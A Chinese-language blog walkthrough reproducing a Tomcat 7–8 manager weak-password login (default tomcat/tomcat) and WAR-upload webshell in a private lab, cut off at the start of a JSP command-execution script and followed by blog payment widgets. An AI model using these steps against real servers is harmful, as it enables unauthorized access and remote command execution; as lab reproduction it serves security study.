Tomcat 弱口令及文件上传漏洞复现

0x01 漏洞介绍

  1. 漏洞描述
    tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。登录成功后有上传点,上传压缩包 xxx.war的.war不会被解析,直接访问 xxx/目录下的木马,拿到权限
  2. 受影响版本
    Tomcat版本:7.0–>8.0

0x02 环境部署:

搭建一次,复现百次
靶机 ip:192.168.30.209
kali ip:192.168.30.182

开启靶场环境
在这里插入图片描述

0x03 漏洞复现

1. 弱口令登录

从网上进行搜索tomcat原始登录名与密码都是tomcat,从github下载tomcat 8的源码,我们可以查看到tomcat的默认登录名为tomcat,并且密码也为tomcat
tomcat 8.0.x 源码
在这里插入图片描述
进行查看登录的用户名及密码
在这里插入图片描述

2. 点击Server Status进行登录

在这里插入图片描述

弱口令tomcat tomcat 直接登录成功
在这里插入图片描述
在这里插入图片描述

3. 发现文件上传点

上传的文件格式必须为war
在这里插入图片描述

4. 上传木马文件

4.1 将三个木马放进exec文件夹
在这里插入图片描述
4.2 将exec文件夹进行压缩为zip格式,手动将后缀zip修改为war
在这里插入图片描述
4.3 上传exec.war文件
在这里插入图片描述
上传成功
在这里插入图片描述

5. 方法一:执行命令
//这是jsp命令执行脚本,带回显
<%
if("666".
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值